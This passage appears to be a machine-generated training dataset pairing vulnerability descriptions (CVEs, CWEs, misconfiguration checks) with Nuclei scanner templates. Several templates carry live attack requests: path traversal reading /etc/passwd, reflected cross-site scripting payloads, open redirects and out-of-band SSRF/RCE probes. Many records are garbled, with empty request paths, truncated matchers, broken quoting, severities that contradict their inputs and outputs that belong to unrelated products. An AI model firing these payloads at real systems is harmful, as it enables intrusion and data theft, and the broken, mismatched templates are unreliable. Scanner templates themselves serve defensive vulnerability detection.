to viewrq.php.\n tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd\" \n - \"{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2008-6668"} +{"instruction": "Generate a Nuclei template for CVE-2021-27315", "input": "Title: SQL Injection in doctor_appointment_system_project doctor_appointment_system\nSummary: Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: doctor_appointment_system_project doctor_appointment_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-27315\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.\n tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2021-27315"} +{"instruction": "Generate a Nuclei template for: Orchard Setup Wizard - Exposure", "input": "Title: Orchard Setup Wizard - Exposure\nSummary: Orchard Setup Wizard - Exposure. Orchard is susceptible to the Installation page exposure due to misconfiguration.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: orchard-installer\n\ninfo:\n name: Orchard Setup Wizard - Exposure\n author: DhiyaneshDK\n severity: high\n description: Orchard is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,exposure,install,orchard,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Orchard Setup - Get Started\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "orchard-installer"} +{"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: wp-reality-estate-theme\n\ninfo:\n name: Reality Estate Multipurpose WP-Theme < 2.5.3 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: Reflected XSS was discovered in the 'Reality | Estate Multipurpose WordPress Theme'.\n tags: wpscan,xss,wordpress,wp,wp-theme,reality,estate,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/properties-with-map/?status&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "high", "id": "CWE-79"} +{"instruction": "Generate a Nuclei template for: Directory Listing - No Host header", "input": "Title: Directory Listing - No Host header\nSummary: Directory Listing - No Host header. The HTTP server is configured to list files in the root directory when no Host header is provided.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: directory-listing-no-host-header\n\ninfo:\n name: Directory Listing - No Host header\n author: kazet\n severity: info\n description: The HTTP server is configured to list files in the root directory when no Host header is provided.\n tags: misconfig,listing,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "directory-listing-no-host-header"} +{"instruction": "Generate a Nuclei template for CVE-2021-32853", "input": "Title: Cross-Site Scripting (XSS) in erxes erxes\nSummary: Erxes, an experience operating system (XOS) with a set of plugins, is vulnerable to cross-site scripting in versions 0.22.3 and prior. This results in client-side code execution. The victim must follow a malicious link or be redirected there from malicious web site. There are no known patches.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: erxes erxes\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-32853\n\ninfo:\n name: Erxes <0.23.0 - Cross-Site Scripting\n author: dwisiswant0\n severity: critical\n description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.\n tags: cve2021,cve,xss,erxes,oss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"topic_id: \"\" \n - \"window.erxesEnv\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-32853"} +{"instruction": "Generate a Nuclei template for CVE-2021-33690", "input": "Title: Vulnerability (CWE-918) in sap netweaver_development_infrastructure\nSummary: Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: sap netweaver_development_infrastructure\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-33690\n\ninfo:\n name: SAP NetWeaver Development Infrastructure - Server Side Request Forgery\n author: DhiyaneshDK\n severity: critical\n description: Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.\n tags: cve2021,cve,oast,ssrf,sap,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Could not connect to the CBS\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2021-33690"} +{"instruction": "Generate a Nuclei template for CVE-2025-4380", "input": "Title: Vulnerability (CWE-98) in scripteo ads_pro\nSummary: The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site.\nVulnerability Type: Vulnerability (CWE-98)\nSeverity: high\nAffected Products: scripteo ads_pro\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-4380\n\ninfo:\n name: Ads Pro Plugin <= 4.89 - Local File Inclusion\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site.\n tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,scripteo,ads-pro,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-4380"} +{"instruction": "Generate a Nuclei template for: Ensure LDAP Server Service is Not Installed", "input": "Title: Ensure LDAP Server Service is Not Installed\nSummary: Ensure LDAP Server Service is Not Installed. The slapd package provides the OpenLDAP server, which manages directory and identity services. If not explicitly required, having this service installed unnecessarily increases the system\u2019s attack surface.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ldap-server\n\ninfo:\n name: Ensure LDAP Server Service is Not Installed\n author: Th3l0newolf\n severity: info\n description: The slapd package provides the OpenLDAP server, which manages directory and identity services. If not explicitly required, having this service installed unnecessarily increases the system\u2019s attack surface.\n tags: cis,local,cisecurity,audit,linux,ubuntu\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ldap-server"} +{"instruction": "Generate a Nuclei template for CVE-2022-23779", "input": "Title: Information Disclosure in zohocorp manageengine_desktop_central\nSummary: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.\nVulnerability Type: Information Disclosure\nSeverity: medium\nAffected Products: zohocorp manageengine_desktop_central\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-23779\n\ninfo:\n name: Zoho ManageEngine - Internal Hostname Disclosure\n author: cckuailong\n severity: medium\n description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.\n tags: cve,cve2022,zoho,exposure,zohocorp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/themes\" \n matchers:\n - type: word\n words:\n - \"/themes/\" \n - \"text/html\" \n part: header\n condition: and\n - type: word\n words:\n - \"{{Host}}\" \n part: location\n - type: word\n words:\n - \"

301 Moved Permanently

\" \n - type: regex\n part: location\n - type: status\n status:\n - 301", "category": "cve", "severity": "medium", "id": "CVE-2022-23779"} +{"instruction": "Generate a Nuclei template for: ScraperAPI API Test", "input": "Title: ScraperAPI API Test\nSummary: ScraperAPI API Test. Easily build scalable web scrapers\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-scraperapi\n\ninfo:\n name: ScraperAPI API Test\n author: daffainfo\n severity: info\n description: Easily build scalable web scrapers\n tags: token-spray,scraperapi\n\nhttp:\n - method: GET\n path:\n - \"http://api.scraperapi.com/account?api_key={{token}}\" \n matchers:\n - type: word\n words:\n - \"\"concurrencyLimit\"\" \n - \"\"concurrentRequests\"\" \n - \"\"requestLimit\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-scraperapi"} +{"instruction": "Generate a Nuclei template for: Remote Desktop Enabled on Non-Server OS", "input": "Title: Remote Desktop Enabled on Non-Server OS\nSummary: Remote Desktop Enabled on Non-Server OS. Checks if Remote Desktop is enabled on workstation editions where it\u2019s not required.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: remote-desktop-enabled-non-server\n\ninfo:\n name: Remote Desktop Enabled on Non-Server OS\n author: princechaddha\n severity: high\n description: Checks if Remote Desktop is enabled on workstation editions where it\u2019s not required.\n tags: windows,remote-desktop,network,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "remote-desktop-enabled-non-server"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: springboot-health\n\ninfo:\n name: Spring Boot Health Actuator Panel - Detect\n author: pussycat0x,TheZakMan\n severity: info\n description: Spring Boot Health Actuator panel was detected.\n tags: springboot,exposure,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/health\" \n - \"{{BaseURL}}/actuator/health\" \n matchers:\n - type: dsl\n condition: and\n - type: word\n words:\n - \"\"components\"\" \n - \"\"diskSpace\"\" \n - \"\"mongo\"\" \n - \"\"jms\"\" \n - \"\"ping\"\" \n - \"\"db\"\" \n - \"\"redis\"\" \n - \"\"livenessState\"\" \n - \"\"readinessState\"\" \n part: body\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Arkose Labs CDN", "input": "Title: Content-Security-Policy Bypass - Arkose Labs CDN\nSummary: Content-Security-Policy Bypass - Arkose Labs CDN. Tags: xss, csp-bypass, arkoselabs-cdn\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: arkoselabs-cdn-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Arkose Labs CDN\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Arkose Labs CDN\n tags: xss,csp-bypass,arkoselabs-cdn,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"arkoselabs.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "arkoselabs-cdn-csp-bypass"} +{"instruction": "Generate a Nuclei template for: ThinkPHP Security Checks", "input": "Title: ThinkPHP Security Checks\nSummary: ThinkPHP Security Checks. A simple workflow that runs all ThinkPHP related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: thinkphp-workflow\n\ninfo:\n name: ThinkPHP Security Checks\n author: dr_set\n severity: info\n description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "thinkphp-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2022-26564", "input": "Title: Cross-Site Scripting (XSS) in digitaldruid hoteldruid\nSummary: HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: digitaldruid hoteldruid\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-26564\n\ninfo:\n name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting\n author: alexrydzak\n severity: medium\n description: HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n tags: cve,cve2022,hoteldruid,xss,digitaldruid,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22>\" \n - \"{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22>&idclienti=1\" \n - \"{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22>\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"HotelDruid\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-26564"} +{"instruction": "Generate a Nuclei template for CVE-2022-42094", "input": "Title: Cross-Site Scripting (XSS) in backdropcms backdrop\nSummary: Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: backdropcms backdrop\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-42094\n\ninfo:\n name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.\n tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"Backdrop CMS\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-42094"} +{"instruction": "Generate a Nuclei template for: BlackEnergy Driver USBMDM Malware Hash - Detect", "input": "Title: BlackEnergy Driver USBMDM Malware Hash - Detect\nSummary: BlackEnergy Driver USBMDM Malware Hash - Detect. Auto-generated rule - detects BlackEnergy Driver USBMDM malware\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: blackenergy-driver-malware-hash\n\ninfo:\n name: BlackEnergy Driver USBMDM Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Auto-generated rule - detects BlackEnergy Driver USBMDM malware\n tags: malware,blackenergy\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "blackenergy-driver-malware-hash"} +{"instruction": "Generate a Nuclei template for CVE-2024-36401", "input": "Title: Vulnerability (CWE-95) in geoserver geoserver and others\nSummary: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n\nThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.\n\nVersions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.\nVulnerability Type: Vulnerability (CWE-95)\nSeverity: critical\nAffected Products: geoserver geoserver, geotools geotools\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-36401\n\ninfo:\n name: GeoServer RCE in Evaluating Property Name Expressions\n author: DhiyaneshDk,ryanborum\n severity: critical\n description: In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n tags: cve,cve2024,geoserver,rce,unauth,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"application/xml\" \n part: content_type", "category": "cve", "severity": "critical", "id": "CVE-2024-36401"} +{"instruction": "Generate a Nuclei template for CVE-2021-25074", "input": "Title: Vulnerability (CWE-601) in webp_converter_for_media_project webp_converter_for_media\nSummary: The WebP Converter for Media WordPress plugin before 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an Open Redirect issue\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: webp_converter_for_media_project webp_converter_for_media\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25074\n\ninfo:\n name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.\n tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2021-25074"} +{"instruction": "Generate a Nuclei template for: Caobox CMS - Detect", "input": "Title: Caobox CMS - Detect\nSummary: Caobox CMS - Detect. Detects instances of Caobox CMS based on unique fingerprints and identifiers.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: caobox-cms-detect\n\ninfo:\n name: Caobox CMS - Detect\n author: Chirag Mistry\n severity: info\n description: Detects instances of Caobox CMS based on unique fingerprints and identifiers.\n tags: detect,caobox,cms,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Caobox CMS\" \n - \"powered by Caobox\" \n - \"Welcome to Caobox\" \n - \"Caobox version\" \n condition: or\n - type: regex", "category": "generic", "severity": "info", "id": "caobox-cms-detect"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sessionize\n\ninfo:\n name: Sessionize User Information - Detect\n author: rxerium\n severity: info\n description: Sessionize user profile information check was conducted.\n tags: osint,osint-social,sessionize,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://sessionize.com/{{user}}\" \n matchers:\n - type: word\n words:\n - \"alt=\"Sessionize\">\" \n - \"profile\" \n - \"Favorite\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: ShadowPad C2 Infrastructure - Detect", "input": "Title: ShadowPad C2 Infrastructure - Detect\nSummary: ShadowPad C2 Infrastructure - Detect. ShadowPad constitutes various plugins having specific functionality and the malware has the capability to \u201cplug\u201d or \u201cunplug\u201d these plugins at run-time in shellcode format. It can also load additional plugins dynamically from the C2 server when required.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: shadowpad-c2\n\ninfo:\n name: ShadowPad C2 Infrastructure - Detect\n author: pussycat0x\n severity: info\n description: ShadowPad constitutes various plugins having specific functionality and the malware has the capability to \u201cplug\u201d or \u201cunplug\u201d these plugins at run-time in shellcode format. It can also load additional plugins dynamically from the C2 server when required.\n tags: ssl,tls,c2,ir,osint,malware,shadowpad,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "shadowpad-c2"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: squirrelmail-login\n\ninfo:\n name: SquirrelMail Login Panel - Detect\n author: dhiyaneshDk,ritikchaddha\n severity: info\n description: SquirrelMail login panel was detected.\n tags: squirrelmail,edb,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/src/login.php\" \n - \"{{BaseURL}}/webmail/src/login.php\" \n - \"{{BaseURL}}/squirrelmail/src/login.php\" \n matchers:\n - type: word\n words:\n - \"SquirrelMail\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: GitLab public signup", "input": "Title: GitLab public signup\nSummary: GitLab public signup. Tags: gitlab, misconfig, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gitlab-public-signup\n\ninfo:\n name: GitLab public signup\n author: pdteam,axrk\n severity: info\n description: GitLab public signup\n tags: gitlab,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/users/sign_in\" \n - \"{{BaseURL}}/users/sign_up\" \n matchers:\n - type: word\n words:\n - \"Register now\" \n - \"data-qa-selector=\"new_user_register_button\"\" \n - type: word\n words:\n - \"https://about.gitlab.com\" \n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"", "category": "generic", "severity": "info", "id": "gitlab-public-signup"} +{"instruction": "Generate a Nuclei template for CVE-2018-14574", "input": "Title: Vulnerability (CWE-601) in djangoproject django and others\nSummary: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: djangoproject django, debian debian_linux, canonical ubuntu_linux\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-14574\n\ninfo:\n name: Django - Open Redirect\n author: pikpikcu\n severity: medium\n description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2018,django,redirect,djangoproject,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//www.interact.sh\" \n matchers:\n - type: word\n words:\n - \"Location: https://www.interact.sh\" \n - \"Location: http://www.interact.sh\" \n part: header\n - type: status\n status:\n - 301", "category": "cve", "severity": "medium", "id": "CVE-2018-14574"} +{"instruction": "Generate a Nuclei template for: Emby Installation Page - Exposure", "input": "Title: Emby Installation Page - Exposure\nSummary: Emby Installation Page - Exposure. Checks for the presence of a Emby Installer Page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: emby-installer\n\ninfo:\n name: Emby Installation Page - Exposure\n author: DhiyaneshDk\n severity: high\n description: Checks for the presence of a Emby Installer Page.\n tags: install,emby,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/index.html?start=wizard#!/wizard/wizardstart.html\" \n matchers:\n - type: word\n words:\n - \"Auto-Install\" \n - \"emby-elements\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "emby-installer"} +{"instruction": "Generate a Nuclei template for: CleanWeb Login Panel - Detect", "input": "Title: CleanWeb Login Panel - Detect\nSummary: CleanWeb Login Panel - Detect. CleanWeb login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cleanweb-panel\n\ninfo:\n name: CleanWeb Login Panel - Detect\n author: righettod\n severity: info\n description: CleanWeb login panel was detected.\n tags: panel,cleanweb,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "cleanweb-panel"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - reCAPTCHA Net", "input": "Title: Content-Security-Policy Bypass - reCAPTCHA Net\nSummary: Content-Security-Policy Bypass - reCAPTCHA Net. Tags: xss, csp-bypass, recaptcha-net\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: recaptcha-net-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - reCAPTCHA Net\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - reCAPTCHA Net\n tags: xss,csp-bypass,recaptcha-net,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"google.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "recaptcha-net-csp-bypass"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fortitester-login-panel\n\ninfo:\n name: Fortinet FortiTester Login Panel - Detect\n author: DhiyaneshDk\n severity: info\n description: Fortinet FortiTester login panel was detected.\n tags: panel,fortinet,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n - \"{{BaseURL}}/index.html\" \n matchers:\n - type: word\n words:\n - \"FortiTester\" \n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not 